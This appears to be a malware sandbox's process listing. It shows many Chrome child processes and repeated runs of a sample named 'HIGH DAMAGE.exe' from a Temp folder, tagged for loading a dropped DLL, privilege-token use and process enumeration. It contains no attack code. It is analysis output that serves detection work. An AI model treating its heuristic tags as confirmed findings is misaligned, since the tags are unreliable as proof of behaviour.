C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:8
2⤵
PID:2660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
2⤵
PID:2696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2132 /prefetch:1
2⤵
PID:2760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1436 /prefetch:8
2⤵
PID:2828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1
2⤵
PID:2864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2192 /prefetch:1
2⤵
PID:2872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2028 /prefetch:1
2⤵
PID:2880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2116 /prefetch:8
2⤵
PID:3068

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
1⤵
PID:2160

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
1⤵
PID:2232

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
2⤵
- Loads dropped DLL
PID:2248

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
1⤵
PID:2280

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
2⤵
- Loads dropped DLL
PID:2296

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
1⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
2⤵
- Loads dropped DLL
PID:2360

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x55c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:1996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6464f50,0x7fef6464f60,0x7fef6464f70
2⤵
PID:600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1052,11089553451484169160,14640330632078061273,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1072 /prefetch:2
2⤵
PID:2856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1052,11089553451484169160,14640330632078061273,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1268 /prefetch:8
2⤵
PID:2852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:2804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6464f50,0x7fef6464f60,0x7fef6464f70
2⤵
PID:2816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1012 /prefetch:2
2⤵
PID:2144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1324 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1776 /prefetch:8
2⤵
PID:2568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2096 /prefetch:1
2⤵
PID:1960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2088 /prefetch:1
2⤵
PID:1128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
2⤵
PID:2600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:2
2⤵
PID:2720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:1
2⤵
PID:2476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3500 /prefetch:8
2⤵
PID:2724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:8
2⤵
PID:436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3732 /prefetch:8
2⤵
PID:2964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
2⤵
PID:2216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2036 /prefetch:1
2⤵
PID:2296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2032 /prefetch:1
2⤵
PID:1720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
2⤵
PID:1748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1476 /prefetch:1
2⤵
PID:2084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3268 /prefetch:8
2⤵
PID:328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
2⤵
PID:2460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
2⤵
PID:1252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:8
2⤵
PID:2580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2796 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3280 /prefetch:8
2⤵
PID:3008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3560 /prefetch:8
2⤵
PID:2704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3088 /prefetch:8
2⤵
PID:1812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:8
2⤵
PID:2856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
2⤵
PID:2124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
2⤵
PID:1856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
2⤵
PID:2472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
2⤵
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
2⤵
PID:1696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
2⤵
PID:980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3768 /prefetch:8
2⤵
PID:640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
2⤵
PID:2484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
2⤵
PID:900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
2⤵
PID:2552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
2⤵
PID:2620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
2⤵
PID:964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
2⤵
PID:1316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
2⤵
PID:2504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
2⤵
PID:436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
2⤵
PID:2328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:8
2⤵
PID:2952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2072 /prefetch:1
2⤵
PID:1168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
2⤵
PID:1596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1556 /prefetch:1
2⤵
PID:904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4384 /prefetch:8
2⤵
PID:2484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2296 /prefetch:8
2⤵
PID:1216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
2⤵
PID:2008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:1
2⤵
PID:1136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:8
2⤵
PID:1804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4040 /prefetch:8
2⤵
PID:2364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
2⤵
PID:2856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
2⤵
PID:288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
2⤵
PID:2548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
2⤵
PID:2472

C:\Program Files\Google\Chrome\Application\chrome.exe
